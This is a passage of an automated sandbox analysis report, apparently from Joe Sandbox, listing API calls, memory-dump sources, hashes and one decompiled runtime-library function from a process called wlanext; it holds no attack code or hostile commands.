                    • RtlAllocateHeap.NTDLL(00A14536,?,00A14CAF,00A14CAF,?,00A14536,?,?,?,?,?,00000000,00000000,?), ref: 00A1A65D
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: 6677d0ecbdb5cad8dea1915ef70276498e15136ce6c3ae0cd8752fbfec9d5ce6
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: 93E012B1200208ABDB14EF99CC41EA777ACEF88664F118558BA0C5B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 649a98f1a022be45ad4837e8805004660904cbd50b8d7d0f66417c008fdfceb0
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: B5E01AB12002086BDB10DF49CC85EE737ADEF88650F118154BA0C57241C930E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A807 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: a14bfa4abcacbe79f8c84cce27c31b4fbe4b4f2115a74e1ccccb0134015f2e8b
                    • Instruction ID: 420ee1fd37abf15d264720f1617d9e6e083e0b8614f50c334a00feb232c80766
                    • Opcode Fuzzy Hash: a14bfa4abcacbe79f8c84cce27c31b4fbe4b4f2115a74e1ccccb0134015f2e8b
                    • Instruction Fuzzy Hash: 55E04FB1200204BBDB20DF44CC84EE73769EF88350F118554F90D57241C631E9518BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A0F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00A08D14,?), ref: 00A0F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 538d0b5d883668abae1b4ec096c8210103a481458ced70208cc35751112e5aca
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: C0D05E656503082AE610AAA89C03F6632896B44B00F490064F948AA2C3D950E4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0336967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                    • Instruction ID: 254d0ed19f6d01c9f1a4768e9cce2a5880be08d8a6d4c3fb5f0e2d83501e69d1
                    • Opcode Fuzzy Hash: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                    • Instruction Fuzzy Hash: 0CB09B719015C5C9E611D7604B4871779047BD0751F16C0A1D1020641E477CC091F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 033BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E033BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0336CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E033B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E033B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x033bfdda
                    0x033bfde2
                    0x033bfde5
                    0x033bfdec
                    0x033bfdfa
                    0x033bfdff
                    0x033bfe0a
                    0x033bfe0f
                    0x033bfe17
                    0x033bfe1e
                    0x033bfe19
                    0x033bfe19
                    0x033bfe19
                    0x033bfe20
                    0x033bfe21
                    0x033bfe22
                    0x033bfe25
                    0x033bfe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033BFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033BFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033BFE01
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                    • Instruction ID: a77c08b410e4a9bd98df8ba08318ef9d5aa08268d2e7542b81c55bc88d5f9bb8
                    • Opcode Fuzzy Hash: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                    • Instruction Fuzzy Hash: D3F0C236A00201BFE6259A45DC82E67BB6AEB45730F144214F7285A9E1DA62F83086A4
                    Uniqueness

                    Uniqueness Score: -1.00%